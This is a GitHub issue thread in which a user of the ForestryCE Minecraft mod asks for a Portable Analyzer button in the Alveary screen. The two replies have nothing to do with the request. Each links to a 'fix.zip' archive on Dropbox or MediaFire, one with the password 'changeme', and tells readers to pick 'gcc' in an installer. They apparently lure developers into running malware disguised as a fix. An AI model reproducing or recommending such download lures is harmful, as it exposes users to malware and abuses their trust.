### ISSUE TITLE
Add Alyzer widget to the Alveary GUI

### ISSUE THREAD

**Issue by thedarkcolour** [thedarkcolour/ForestryCE#66]
The beehouse and apiary blocks have a button that lets you use your Portable Analyzer from inside the blocks' GUI to analyze the current queen/princess/drones. It would be nice to have this in the Alveary screen, too.

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
